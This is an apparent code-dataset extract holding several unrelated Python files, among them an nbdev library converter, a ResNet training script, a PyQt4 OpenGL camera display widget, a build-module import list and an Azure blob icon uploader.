[['88.74', ], ],
[['88.81', ], ],
[['95.93', ], ],
[['92.55', ], ],
[['93.25', ], ],
[['94.89', ], ],
[['92.07', ], ],
[['97.30', ], ],
[['95.69', ], ],
[['95.21', ], ],
[['91.75', ], ],
]
| 2.046875 | 2 |
lib2nbdev/convert.py | manisnesan/lib2nbdev | 27 | 12772946 | # AUTOGENERATED! DO NOT EDIT! File to edit: 00_convert.ipynb (unless otherwise specified).
__all__ = ['code_cell', 'write_module_cell', 'init_nb', 'write_cell', 'write_nb', 'convert_lib']
# Cell
import json
from fastcore.basics import Path
from fastcore.xtras import is_listy
from fastcore.foundation import Config
from fastcore.script import call_parse
from fastprogress.fastprogress import progress_bar
from nbdev.export import nbglob, export_names, _re_class_func_def, _re_obj_def
from nbdev.sync import _split
from .generators import generate_settings, generate_ci, generate_doc_foundations, generate_setup
# Cell
def code_cell(code:str=None) -> str:
"""
Returns a Jupyter cell with potential `code`
"""
cell = {
"cell_type": "code",
"execution_count": None,
"metadata": {},
"outputs": [],
"source": []
}
if is_listy(code):
for i, c in enumerate(code):
if i < len(code)-1:
cell["source"].append(c+'\n')
else:
cell["source"].append(c)
elif code: cell["source"].append(code)
return cell
# Cell
def write_module_cell() -> str:
"""
Writes a template `Markdown` cell for the title and description of a notebook
"""
return {
"cell_type": "markdown",
"metadata": {},
"source": [
"# Default Title (change me)\n",
"> Default description (change me)"
]
}
# Cell
def init_nb(module_name:str) -> str:
"""
Initializes a complete blank notebook based on `module_name`
Also writes the first #default_exp cell and checks for a nested module (moduleA.moduleB)
"""
if module_name[0] == '.': module_name = module_name.split('.')[1]
if '.ipynb' in module_name: module_name = module_name.split('.ipynb')[0]
return {"cells":[code_cell(f"# default_exp {module_name}"), write_module_cell()],
"metadata":{
"jupytext":{"split_at_heading":True},
"kernelspec":{"display_name":"Python 3", "language": "python", "name": "python3"}
},
"nbformat":4,
"nbformat_minor":4}
# Cell
def write_cell(code:str, is_public:bool=False) -> str:
"""
Takes source `code`, adds an initial #export tag, and writes a Jupyter cell
"""
if is_public is None: export = ''
export = '#export' if is_public else '#exporti'
source = [f"{export}"] + code.split("\n")
return code_cell(source)
# Cell
def write_nb(cfg_path:str, cfg_name:str, splits:list, num:int, parent:str=None, private_list:list=[]) -> str:
"""
Writes a fully converted Jupyter Notebook based on `splits` and saves it in `Config`'s `nbs_path`.
The notebook number is based on `num`
`parent` denotes if the current notebook module is based on a parent module
such as `moduleA.moduleB`
`private_list` is a by-cell list of `True`/`False` for each block of code of whether it is private or public
"""
# Get filename
fname = splits[0][0]
if fname[0] == '.': fname = fname[1:]
if parent is not None: fname = f'{parent}.{fname}'
# Initialize and write notebook
nb = init_nb(fname)
for i, (_, code) in enumerate(splits):
c = write_cell(code, private_list[i])
nb["cells"].append(c)
# Figure out the notebook number
if num < 10:
fname = f'0{num}_{fname}'
else:
fname = f'{num}_{fname}'
# Save notebook in `nbs_path`
with open(f'{Config(cfg_path, cfg_name).path("nbs_path")/fname}', 'w+') as source_nb:
source_nb.write(json.dumps(nb))
# Internal Cell
def _not_private(n):
"Checks if a func is private or not, alternative to nbdev's"
for t in n.split('.'):
if (t.startswith('_') and not t.startswith('__')): return False
return '\\' not in t and '^' not in t and t != 'else'
# Cell
@call_parse
def convert_lib():
"""
Converts existing library to an nbdev one by autogenerating notebooks.
Optional prerequisites:
- Make a nbdev settings.ini file beforehand
- Optionally you can add `# Cell` and `# Internal Cell` tags in the source files where you would like specific cells to be
Run this command in the base of your repo
**Can only be run once**
"""
print('Checking for a settings.ini...')
cfg_path, cfg_name = '.', 'settings.ini'
generate_settings()
print('Gathering files...')
files = nbglob(extension='.py', config_key='lib_path', recursive=True)
if len(files) == 0: raise ValueError("No files were found, please ensure that `lib_path` is configured properly in `settings.ini`")
print(f'{len(files)} modules found in the library')
num_nbs = len(files)
nb_path = Config(cfg_path, cfg_name).path('nbs_path')
nb_path.mkdir(exist_ok=True)
print(f'Writing notebooks to {nb_path}...')
if nb_path.name == Config(cfg_path, cfg_name).lib_name:
nb_path = Path('')
slash = ''
else:
nb_path = Path(nb_path.name)
slash = '/'
for num, file in enumerate(progress_bar(files)):
if (file.parent.name != Config(cfg_path, cfg_name).lib_name) and slash is not None:
parent = file.parent.name
else:
parent = None
fname = file.name.split('.py')[0] + '.ipynb'
if fname[0] == '.': fname = fname[1:]
# Initial string in the .py
init_str = f"# AUTOGENERATED! DO NOT EDIT! File to edit: {nb_path}{slash}{fname} (unless otherwise specified).\n\n# Cell\n"
# Override existing code to include nbdev magic and one code cell
with open(file, encoding='utf8') as f: code = f.read()
if "AUTOGENERATED" not in code:
code = init_str + code
# Check to ensure we haven't tried exporting once yet
if "# Cell" and "# Internal Cell" not in code and '__all__' not in code:
split_code = code.split('\n')
private_list = [True]
_do_pass, _private, _public = False, '# Internal Cell\n', '# Cell\n'
for row, line in enumerate(split_code):
if _do_pass: _do_pass = False; continue
# Deal with decorators
if '@' in line:
code = split_code[row+1]
if code[:4] == 'def ': code = code[4:]
if 'patch' in line or 'typedispatch' in line or not line[0].isspace():
is_private = _not_private(code.split('(')[0])
private_list.append(is_private)
split_code[row] = f'{_public}{line}' if is_private else f'{_private}{line}'
_do_pass = True
# Deal with objects
elif _re_obj_def.match(line) and not _do_pass:
is_private = _not_private(line.split('(')[0])
private_list.append(is_private)
split_code[row] = f'{_public}{line}' if is_private else f'{_private}{line}'
# Deal with classes or functions
elif _re_class_func_def.match(line) and not _do_pass:
is_private = _not_private(line.split(' ')[1].split('(')[0])
private_list.append(is_private)
split_code[row] = f'{_public}{line}' if is_private else f'{_private}{line}'
code = '\n'.join(split_code)
# Write to file
with open(file, 'w', encoding='utf8') as f: f.write(code)
# Build notebooks
splits = _split(code)
write_nb(cfg_path, cfg_name, splits, num, parent, private_list)
# Generate the `__all__` in the top of each .py
if '__all__' not in code:
c = code.split("(unless otherwise specified).")
code = c[0] + "(unless otherwise specified).\n" + f'\n__all__ = {export_names(code)}\n\n# Cell' + c[1]
with open(file, 'w', encoding='utf8') as f: f.write(code)
else:
print(f"{file.name} was already converted.")
generate_doc_foundations()
print(f"{Config(cfg_path, cfg_name).lib_name} successfully converted!")
_setup = int(input("Would you like to setup this project to be pip installable and configure a setup.py? (0/1)"))
if _setup:
generate_setup()
print('Project is configured for pypi, please see `setup.py` for any advanced configurations')
_workflow = int(input("Would you like to setup the automated Github workflow that nbdev provides? (0/1)"))
if _workflow:
generate_ci()
print("Github actions generated! Please make sure to include .github/actions/main.yml in your next commit!") | 2.078125 | 2 |
train.py | SumitM0432/Explicit-Content-Classifier-using-ResNet | 3 | 12772947 | import torch
import config
import engine
import dataset_prep
import torch.nn as nn
import model
import metrics
import matplotlib.pyplot as plt
if __name__ == '__main__':
# DataLoaders
train_loader, val_loader = dataset_prep.tr_dataset(batch_size = config.BATCH_SIZE)
classes = val_loader.dataset.dataset.class_to_idx
print (classes)
# Model
# model_load = model.resnet_model_50()
model_load = model.resnet_model_101()
model_load.to(config.DEVICE)
print ('Model Loaded ---------- \n')
# # Loss, Optimizer and Scheduler
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model_load.parameters(), lr = config.LEARNING_RATE)
# scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer)
print ('Training Started ---------- \n')
trained_model, train_losses, val_losses = engine.training_func(model_load, train_loader, val_loader, config.EPOCHS, config.DEVICE, optimizer, criterion)
torch.save(trained_model.state_dict(), config.OUT + 'resnet101_e5_0.0001.pth')
print ('Model Saved ---------- \n')
# Plotting the training and validation loss
plt.plot(train_losses, label='Training loss')
plt.plot(val_losses, label='Validation loss')
plt.legend(frameon=False)
plt.show()
| 2.4375 | 2 |
pydc1394/ui/qt/display.py | joristork/milovision | 8 | 12772948 | #!/usr/bin/env python
# encoding: utf-8
#
# This file is part of pydc1394.
#
# pydc1394 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# pydc1394 is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with pydc1394. If not, see
# <http://www.gnu.org/licenses/>.
#
# Copyright (C) 2009, 2010 by <NAME> <<EMAIL>>
# and the pydc1394 contributors (see README File)
"""
This file contains a live Display Widget and a Live Display Window
that can be used to interactively display a Camera image
this package requires pyqt4
"""
from __future__ import division
import time
from OpenGL.GL import *
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtOpenGL import *
import numpy as np
try:
from Utils import saveload as Sl
except ImportError:
pass
__all__ = [ "LiveCameraWin", "ImageDisplay", ]
class AcquisitionThread(QThread):
def __init__(self, cam, parent = None):
super(AcquisitionThread, self).__init__(parent)
self._stopped = False
self._mutex = QMutex()
self._cam = cam
self.start()
def stop(self):
try:
self._mutex.lock()
self._stopped = True
finally:
self._mutex.unlock()
def isStopped(self):
s = False
try:
self._mutex.lock()
s = self._stopped
finally:
self._mutex.unlock()
return s
def run(self):
if not self._cam.running:
self._cam.start(interactive=True)
while not self.isStopped():
self._cam.new_image.acquire()
if not self._cam.running:
self.stop()
else:
self.emit(SIGNAL("newImage"), self._cam.current_image)
self._cam.new_image.release()
class LiveCameraWin(QWidget):
def __init__(self, cam, zoom = 1.0, parent = None):
super(LiveCameraWin, self).__init__(parent)
self.camWidget = ImageDisplay(cam.mode.shape, cam.mode.dtype, zoom)
mainLayout = QHBoxLayout()
mainLayout.addWidget(self.camWidget)
self.setLayout(mainLayout)
self.setWindowTitle(
"Camera %s, GUID %s, %s, %.1f fps" % (
cam.model, cam.guid, str(cam.mode), cam.fps)
)
self.acquisitionThread = AcquisitionThread(cam)
self.connect(self.acquisitionThread,
SIGNAL("newImage"), self.camWidget.newImage)
def sizeHint(self):
msh = self.camWidget.minimumSizeHint()
return QSize( msh.width() + self.layout().margin()*2,
msh.height() + self.layout().margin()*2)
def closeEvent(self, evt):
self.acquisitionThread.stop()
class ImageDisplay(QGLWidget):
def __init__(self, shape, dtype, zoom = 1.0, parent=None):
"""
This function implements a Panel which can display Live Video stream
to the user. It also implements saving the current image to a file
by keyboard stroke.
The Display is implemented using OpenGL, it defines a GLGanvas with
the same coordinate frame as the shown image (0,0 is therefore the
top left border).
shape - numpy shape tuple of data to display
dtype - numpy data type of image data to display
zoom - how much should the image be resized
parent - parent of this panel
"""
f = QGLFormat()
# The next line decides if the image flickers or not.
# Unfortunately, if the image doesn't flicker, we do not get
# a high enough frame rate to display our camera images if we try
# to display them all. We now use a QTimer to redraw our window
# every 1/60 of a second, and this seems to work well.
f.setSwapInterval(1)
super(ImageDisplay, self).__init__(f, parent)
self._arr = np.empty(shape, dtype=dtype)
self._gldrawmode = GL_LUMINANCE if len(shape) == 2 else GL_RGB
self._zoom = zoom
if dtype[-1] in ['1','8']:
self._glinternal = GL_UNSIGNED_BYTE
elif dtype[-2:] == '16' or dtype[-1] == '2':
self._glinternal = GL_UNSIGNED_SHORT
else:
raise RuntimeError, "Unknown datatype!"
sizePolicy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
sizePolicy.setHeightForWidth(True)
self.setSizePolicy(sizePolicy)
self.setFocusPolicy(Qt.WheelFocus)
# We redraw our image 60 times per second; no matter what kind of camera
# is attached
self.aTimer = QTimer()
self.connect(self.aTimer, SIGNAL("timeout()"), self.updateGL)
self.aTimer.start(1000/60)
# Initialisations for FPS calculation
self._ltime = time.time()
self._drawn_frames = 0
self._totframes = 0
def minimumSizeHint(self):
return QSize(self._arr.shape[1]*self._zoom,
self._arr.shape[0]*self._zoom)
def heightForWidth(self, w):
return w/self._arr.shape[1] * self._arr.shape[0]
def newImage(self, i):
self._arr = i
# self.updateGL()
def keyPressEvent(self, evt):
key = evt.key()
if key == Qt.Key_F:
print "FPS: %.2f" % self._fps
elif key == Qt.Key_Space:
Sl.save_image_with_number(
self._arr, "image", "jpg",".")
elif key in map(ord, '123456789'):
self._zoom = int(chr(key))
self.resize(self.minimumSizeHint())
self.parent().adjustSize()
elif key in map(ord,'!"$%&/()') + [ 167 ]:
if evt.modifiers() & Qt.SHIFT:
val = {
ord('!'): 1,
ord('"'): 2,
167: 3,
ord('$'): 4,
ord('%'): 5,
ord('&'): 6,
ord('/'): 7,
ord('('): 8,
ord(')'): 9,
}[key]
self._zoom = 1/val
self.resize(self.minimumSizeHint())
self.parent().adjustSize()
else:
return QGLWidget.keyPressEvent(self, evt)
def initializeGL( self ):
"""
This function initalizes OpenGL according to what we need
in this context
"""
glEnable(GL_TEXTURE_2D); # Enable Texture Mapping
glTexParameteri(GL_TEXTURE_2D,GL_TEXTURE_MAG_FILTER,GL_NEAREST); # Set Texture Max Filter
glTexParameteri(GL_TEXTURE_2D,GL_TEXTURE_MIN_FILTER,GL_NEAREST); # Set Texture Min Filter
# Determine the texture size (which must be 2**x)
texdim_w, texdim_h = 32,32
while texdim_w < self._arr.shape[1]:
texdim_w *= 2
while texdim_h < self._arr.shape[0]:
texdim_h *= 2
self._texture_coords = (float(self._arr.shape[1])/texdim_w,float(self._arr.shape[0])/texdim_h)
# Generate our Texture
# The next line makes sure that bytes are read in the correct
# order while unpacking from python
glPixelStoref(GL_UNPACK_SWAP_BYTES, 1)
glTexImage2D(GL_TEXTURE_2D, 0, self._gldrawmode, texdim_w, texdim_h, 0, self._gldrawmode, self._glinternal, None)
# Set our viewport
w,h = self.width(), self.height()
glViewport(0, 0, w, h)
glClear( GL_COLOR_BUFFER_BIT );
# Set our Projection to Orthographic and the coordinate system
# like the picture
glMatrixMode( GL_PROJECTION );
glLoadIdentity();
glOrtho(0.0, self._arr.shape[1], self._arr.shape[0], 0.0, -1.0, 1.0);
glMatrixMode( GL_MODELVIEW );
glLoadIdentity();
# self._quadric = gluNewQuadric()
def resizeGL(self, width, height):
# Reset our Viewpoint.
glViewport(0, 0, width, height)
def paintGL(self):
# Remake the Texture from the new image data
glTexSubImage2D (GL_TEXTURE_2D, 0, 0, 0,
self._arr.shape[1], self._arr.shape[0],
self._gldrawmode, self._glinternal, self._arr);
glColor3f( 1.,1.,1. )
# Draw the imageplane
x,y = self._texture_coords
glBegin(GL_QUADS)
glTexCoord2f(0.0, 0.); glVertex3f(0., 0., - .5)
glTexCoord2f(x, 0.); glVertex3f(self._arr.shape[1], 0., - .5)
glTexCoord2f(x, y); glVertex3f(self._arr.shape[1],
self._arr.shape[0], - .5)
glTexCoord2f(0., y); glVertex3f(0., self._arr.shape[0], - .5)
glEnd()
# Calculate the FPS
ctime = time.time()
dtime = ctime-self._ltime
if dtime > 1:
fps= self._drawn_frames/dtime
self._ltime = ctime
self._drawn_frames = 0
self._fps = fps
self._drawn_frames += 1
self._totframes += 1
| 1.773438 | 2 |
scripts/build.py | 1byte2bytes/SydChain | 0 | 12772949 | <reponame>1byte2bytes/SydChain
import build_autoconf
import build_automake
import build_bison
import build_libtool
import build_m4
import build_make
import build_cmake
import build_git
import build_mercurial
import build_ccache
import build_gawk
import build_yasm
import build_nasm
import build_mono
import build_rustc
import build_ninja
import build_dmd
#import build_swift
import build_llvm
# i686 toolchain
#import build_i686_binutils
#import build_i686_gcc
| 0.863281 | 1 |
tools/paconn-cli/paconn/apimanager/iconuploader.py | Mounika-Chillamcherla/PowerPlatformConnectors | 0 | 12772950 | # -----------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -----------------------------------------------------------------------------
"""
Uploads an icon for the custom connector
"""
import os
import mimetypes
from urllib.parse import urlparse, urlunparse
from azure.storage.blob import ContentSettings, BlockBlobService
def upload_icon(sas_url, file_path):
# Break the SAS URL
(scheme, netloc, path, params, query, fragment) = urlparse(sas_url)
# Account is the first part of the netlocation upto the dot
account_name = netloc[0:netloc.index('.')]
# Container name is the path
container_name = path.strip('/')
# Create a block blob service
blockblob_service = BlockBlobService(
account_name=account_name,
sas_token=query)
# Get the file name of the icon
file_name = os.path.basename(file_path)
# Determine the content type and encoding for the file
(content_type, content_encoding) = mimetypes.guess_type(file_name)
content_settings = ContentSettings(
content_type=content_type,
content_encoding=content_encoding)
# Upload the icon
blockblob_service.create_blob_from_path(
container_name=container_name,
blob_name=file_name,
file_path=file_path,
content_settings=content_settings)
# Append the icon name to the path to generate the download link
path = path + '/' + file_name
urlparts = (scheme, netloc, path, params, query, fragment)
sas_download_url = urlunparse(urlparts)
return sas_download_url
| 2.5 | 2 |